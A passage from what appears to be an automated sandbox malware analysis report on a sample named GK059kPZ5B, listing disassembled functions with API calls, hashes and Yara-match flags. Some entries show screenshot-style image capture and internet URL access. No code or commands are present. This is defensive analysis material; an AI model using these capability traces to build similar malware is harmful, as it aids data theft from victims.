                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                            • Instruction ID: dafeeb617219bb9f7ba39bed81532712fb4a3a6ac0bca253c21da9f62ac96132
                                                            • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                            • Instruction Fuzzy Hash: 5C7180B1A20216DBCB218F99CC84BBFBB75EF55710F24C229E41AA7191DB709D41CBB0
                                                            APIs
                                                              • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                            • _free.LIBCMT ref: 00430B6F
                                                            • _free.LIBCMT ref: 00430B86
                                                            • _free.LIBCMT ref: 00430BA5
                                                            • _free.LIBCMT ref: 00430BC0
                                                            • _free.LIBCMT ref: 00430BD7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3033488037-0
                                                            • Opcode ID: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                            • Instruction ID: b3708cb7fd5f7c05c7b70e76ebc142bc523ed94c66de99b1f2255d1376b2cc69
                                                            • Opcode Fuzzy Hash: c373ba6c443c71e4ab428eca93eb82442dc6f2775a0feb0437eab9ebf47d5f4f
                                                            • Instruction Fuzzy Hash: BD51DF31A00304ABDB21DF6AC851A6BB7F4EF58724F14566EE809DB250E739A901CB48
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 3033488037-0
                                                            • Opcode ID: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                            • Instruction ID: 6c7787cdb315c236abca36af4a9bc47d9e80c4ca994d9f2744ba681b9aec7471
                                                            • Opcode Fuzzy Hash: 04cddca887ba2481dccaf07e364353f16ad7a97d03e7f311f8a0717563f20aa1
                                                            • Instruction Fuzzy Hash: 5151B272A00604AFDB60EF69D982A6BB7F4FF58720B144A69E909D7250E735ED05CB80
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                            • Instruction ID: 2269d71fc1307fb615fcd26a16e66de3d258f5a42cea17c2f792775dd2d74ff0
                                                            • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                            • Instruction Fuzzy Hash: E541C432E00204AFCB10DF78C981A5AB7B5EF89714F15456EE516EB391DB35ED02CB84
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                            • Instruction ID: 7064a26a68620d3643521f36cdf4ff08893b05e77d2039a53cdfb0ffdb8a379f
                                                            • Opcode Fuzzy Hash: 709da5f20d6e6a4df2ef3b0591b918cf649e9a4efbf4d631092fdebfca928cec
                                                            • Instruction Fuzzy Hash: 7441A136A003049FDB14EF78C981A5EB7F9EF85714F154669E515EB391D731AE02CB80
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D11A,00000000,00000000,0042D958,?,0042D958,?,00000001,0042D11A,23E85006,00000001,0042D958,0042D958), ref: 0043690A
                                                            • __alloca_probe_16.LIBCMT ref: 00436942
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436993
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004369A5
                                                            • __freea.LIBCMT ref: 004369AE
                                                              • Part of subcall function 004336C7: RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                            • String ID:
                                                            • API String ID: 313313983-0
                                                            • Opcode ID: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                            • Instruction ID: 564015b8663966f91a736df8c1f199cffa5732d11cc50b43fea489f3b547491b
                                                            • Opcode Fuzzy Hash: 3e8a2e8aab748589cebb1bfb4cc7bc8f0b8dcb51511829ebe5bc338c40e17782
                                                            • Instruction Fuzzy Hash: 0A31CE72A0020AAFDF249F65CC41EAF7BA5EF44714F16422AFC04D6290EB39CD54CB98
                                                            APIs
                                                            • _SpinWait.LIBCONCRT ref: 0041AF0B
                                                              • Part of subcall function 00410F41: _SpinWait.LIBCONCRT ref: 00410F59
                                                            • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AF1F
                                                            • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF51
                                                            • List.LIBCMT ref: 0041AFD4
                                                            • List.LIBCMT ref: 0041AFE3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                            • String ID:
                                                            • API String ID: 3281396844-0
                                                            • Opcode ID: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                            • Instruction ID: 96d9cd947b213099fbcac924e0358b3b7b3cf073485a4601a3d8c747dc036099
                                                            • Opcode Fuzzy Hash: 1637b491240e50c5e643825cbab1343b8211ccee4cd56710176c1192e2ab3ef7
                                                            • Instruction Fuzzy Hash: 8C318971D02656DFCB14EFA5C5816EEBBB1BF04308F04006FE80167292DB786DA5CB9A
                                                            APIs
                                                            • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00402086
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 0040208E
                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 004020A9
                                                            • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020D3
                                                            • GdiplusShutdown.GDIPLUS(?), ref: 004020FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                            • String ID:
                                                            • API String ID: 2357751836-0
                                                            • Opcode ID: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                            • Instruction ID: c4f18e326f444715a52338ef43c677910c1406114480214147ef42e81c070973
                                                            • Opcode Fuzzy Hash: 217f5abb5afa1b455eb2dbd7401cc4696c8519af6d5153b3f711d937d629bad7
                                                            • Instruction Fuzzy Hash: 4D2151B5A0031AAFDB10DFA5DD499AFFBB9FF48741B104036E906E3290D7759901CBA8
                                                            APIs
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00A550C8
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00A550DC
                                                              • Part of subcall function 00A5BDD3: __EH_prolog3_GS.LIBCMT ref: 00A5BDDA
                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00A55141
                                                            • __Getcoll.LIBCPMT ref: 00A55150
                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00A55160
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$GetcollH_prolog3_
                                                            • String ID:
                                                            • API String ID: 1844465188-0
                                                            • Opcode ID: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                            • Instruction ID: c266b5f71edd4b5e0d354e7941db270e5655c2abb3014ee41eaeb70b0be30d78
                                                            • Opcode Fuzzy Hash: bdce9d8e1be77268be16da58274f9ad6a83026367902608090edaa3f01144fdf
                                                            • Instruction Fuzzy Hash: C12192B1C14714EFDB00EFA0D551BDDBBB0FF44762F508519E845AB182DB749A88CB91
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,?,0042EAEE,00434D9C,?,00431F28,00000001,00000364,?,0042E005,00457910,00000010), ref: 00431F83
                                                            • _free.LIBCMT ref: 00431FB8
                                                            • _free.LIBCMT ref: 00431FDF
                                                            • SetLastError.KERNEL32(00000000), ref: 00431FEC
                                                            • SetLastError.KERNEL32(00000000), ref: 00431FF5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                            • Instruction ID: 1e3cd072d0496c43a3242b2b2daca3b64790c0c87830b362050c04c7c8c4abe4
                                                            • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                            • Instruction Fuzzy Hash: 2101F936149A007BD61227255C45D6B262DABD977AF20212FF815933E2EFAD8906412D
                                                            APIs
                                                            • GetLastError.KERNEL32(00A5DAFC,00A5DAFC,00000002,00A7ED55,00A83971,00000000,?,00A76A25,00000002,00000000,00000000,00000000,?,00A5CFAD,00A5DAFC,00000004), ref: 00A821EA
                                                            • _free.LIBCMT ref: 00A8221F
                                                            • _free.LIBCMT ref: 00A82246
                                                            • SetLastError.KERNEL32(00000000,?,00A5DAFC), ref: 00A82253
                                                            • SetLastError.KERNEL32(00000000,?,00A5DAFC), ref: 00A8225C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                            • Instruction ID: fa68021a2c94f24fdd98c3393063a9696cdb60899bad8275a93334bafaebbbc4
                                                            • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                            • Instruction Fuzzy Hash: EA01F976505B0037C21237345D86FBB266DEFD2BB2B200539F915922D2FE608D028325
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                            • _free.LIBCMT ref: 00431F31
                                                            • _free.LIBCMT ref: 00431F59
                                                            • SetLastError.KERNEL32(00000000), ref: 00431F66
                                                            • SetLastError.KERNEL32(00000000), ref: 00431F72
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                            • Instruction ID: 89f26f5adfa52999dd97e159cd61ed3cb5fd8874f2961931db20f525c950a72a
                                                            • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                            • Instruction Fuzzy Hash: 0AF02D3A50CA0037D61637356C06B5F26199FD9B67F30212FF814923F2EF6D8806412D
                                                            APIs
                                                            • GetLastError.KERNEL32(?,?,00A7AA0C,?,00000000,?,00A7CE06,00A5249A,00000000,?,00451F20), ref: 00A82165
                                                            • _free.LIBCMT ref: 00A82198
                                                            • _free.LIBCMT ref: 00A821C0
                                                            • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821CD
                                                            • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A821D9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                            • Instruction ID: f31913fe3a8bc4f5c4bc6a607da3b3ca09b20d7a6e6ed606bc06b1939cf61060
                                                            • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                            • Instruction Fuzzy Hash: 8DF0C836544B0177D6113738AD0EB3F26699FC2FA2F350624FE18D22D2FE618D524369
                                                            APIs
                                                              • Part of subcall function 0041275D: TlsGetValue.KERNEL32(?,?,00410B7B,00412C88,00000000,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412763
                                                            • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041796A
                                                              • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FFA
                                                              • Part of subcall function 00420FD3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00421013
                                                              • Part of subcall function 00420FD3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421089
                                                              • Part of subcall function 00420FD3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421091
                                                            • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417978
                                                            • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417982
                                                            • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041798C
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004179AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                            • String ID:
                                                            • API String ID: 4266703842-0
                                                            • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                            • Instruction ID: 8cd570ce40639c9f8c017ae24bf7a6ba5e4898ad5d78eaa9f9672d2de087314b
                                                            • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                            • Instruction Fuzzy Hash: 0BF04671A0422867CE15B7229812AEEB72A9F90718F40012FF41093283DF6C9E9986CD
                                                            APIs
                                                              • Part of subcall function 00A629C4: TlsGetValue.KERNEL32(?,?,00A60DE2,00A62EEF,00000000,?,00A60DC0,?,?,?,00000000,?,00000000), ref: 00A629CA
                                                            • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00A67BD1
                                                              • Part of subcall function 00A7123A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00A71261
                                                              • Part of subcall function 00A7123A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00A7127A
                                                              • Part of subcall function 00A7123A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00A712F0
                                                              • Part of subcall function 00A7123A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00A712F8
                                                            • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00A67BDF
                                                            • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00A67BE9
                                                            • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00A67BF3
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00A67C11
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                            • String ID:
                                                            • API String ID: 4266703842-0
                                                            • Opcode ID: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                            • Instruction ID: cea7367fb2e444ad1418b30be93aa89d15389e4df95a3c595e13edd8a129afa8
                                                            • Opcode Fuzzy Hash: 628a427f14d65ae0316e958808638e899d0bf8bb4e808d91dcdcee0cd99b9220
                                                            • Instruction Fuzzy Hash: A8F08B31A0011867CF15F374D9129AEB73ACF80B14B00812AF41297282EF368E458BC1
                                                            APIs
                                                            • _free.LIBCMT ref: 00439E7D
                                                              • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                              • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                            • _free.LIBCMT ref: 00439E8F
                                                            • _free.LIBCMT ref: 00439EA1
                                                            • _free.LIBCMT ref: 00439EB3
                                                            • _free.LIBCMT ref: 00439EC5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                            • Instruction ID: 3df159f09b4f07c7f9cd4576f3114e9092ca915295917fe09ca5bd5d66e4921a
                                                            • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                            • Instruction Fuzzy Hash: 61F04F32409200ABC620EB59E483C1773D9BB08712F686A4FF04CDB751CBBAFC808A5D
                                                            APIs
                                                            • _free.LIBCMT ref: 00A8A0E4
                                                              • Part of subcall function 00A836F1: HeapFree.KERNEL32(00000000,00000000,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?), ref: 00A83707
                                                              • Part of subcall function 00A836F1: GetLastError.KERNEL32(?,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?,?), ref: 00A83719
                                                            • _free.LIBCMT ref: 00A8A0F6
                                                            • _free.LIBCMT ref: 00A8A108
                                                            • _free.LIBCMT ref: 00A8A11A
                                                            • _free.LIBCMT ref: 00A8A12C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                            • Instruction ID: b9ee35ee30a54116f080375be6d6c3d2e3fbeece79fd662a5b1b8495bb08554f
                                                            • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                            • Instruction Fuzzy Hash: 20F04F33505200AB9A20FB5CE9C7C0A73E9AA10B91F640E16F008D7751DF35FC908B5A
                                                            APIs
                                                            • _free.LIBCMT ref: 00431768
                                                              • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                              • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                            • _free.LIBCMT ref: 0043177A
                                                            • _free.LIBCMT ref: 0043178D
                                                            • _free.LIBCMT ref: 0043179E
                                                            • _free.LIBCMT ref: 004317AF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                            • Instruction ID: 59d86e5f81b59af28f084099f89460b905b5d9e26065712495255f22da63edd4
                                                            • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                            • Instruction Fuzzy Hash: 01F03070C003109B9A226F25AC414553B60AF2D727F04636FF4069B273C77ADA52DF8E
                                                            APIs
                                                            • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCEF
                                                            • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD20
                                                            • GetCurrentThread.KERNEL32 ref: 0041CD29
                                                            • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD3C
                                                            • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD45
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4554805907.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_GK059kPZ5B.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                            • String ID:
                                                            • API String ID: 2583373041-0
                                                            • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                            • Instruction ID: c40835f97e64ecf2e035c3ed6e644cfe8c904edaac08ffe142c14ca74381b7ad
                                                            • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                            • Instruction Fuzzy Hash: 81F0AE762406109B8625FF11FD518F777759FC4715300051FE44B47551CF28A9C1D7A6
                                                            APIs
                                                            • _free.LIBCMT ref: 00A819CF
                                                              • Part of subcall function 00A836F1: HeapFree.KERNEL32(00000000,00000000,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?), ref: 00A83707
                                                              • Part of subcall function 00A836F1: GetLastError.KERNEL32(?,?,00A8A37F,?,00000000,?,00000000,?,00A8A623,?,00000007,?,?,00A8AA17,?,?), ref: 00A83719
                                                            • _free.LIBCMT ref: 00A819E1
                                                            • _free.LIBCMT ref: 00A819F4
                                                            • _free.LIBCMT ref: 00A81A05
                                                            • _free.LIBCMT ref: 00A81A16
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                            • Instruction ID: 3b596edfd4d43bbc1703859903431802406575f520873067e0f8b98415b19621
                                                            • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                            • Instruction Fuzzy Hash: CAF03071C00311AB8E217F18AD824093F64AF19B627000A76F40297373DB74D963DB8E
                                                            APIs
                                                            • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 00A6CF56
                                                            • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 00A6CF87
                                                            • GetCurrentThread.KERNEL32 ref: 00A6CF90
                                                            • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 00A6CFA3
                                                            • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 00A6CFAC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_a50000_GK059kPZ5B.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                            • String ID:
                                                            • API String ID: 2583373041-0
                                                            • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                            • Instruction ID: 1a1940b453d985e9d536e72978bd075b6d8c2b500c0eb80809e733fe9241fe4d
                                                            • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                            • Instruction Fuzzy Hash: C0F0A033300A009BCA25EF21FA508BB77B6AFC4720300454CF4870B652CF22E902DB71
                                                            APIs
                                                            • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00A52EAE
                                                              • Part of subcall function 00A51321: _wcslen.LIBCMT ref: 00A51328
                                                              • Part of subcall function 00A51321: _wcslen.LIBCMT ref: 00A51344
                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00A530C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.4555591206.0000000000A50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
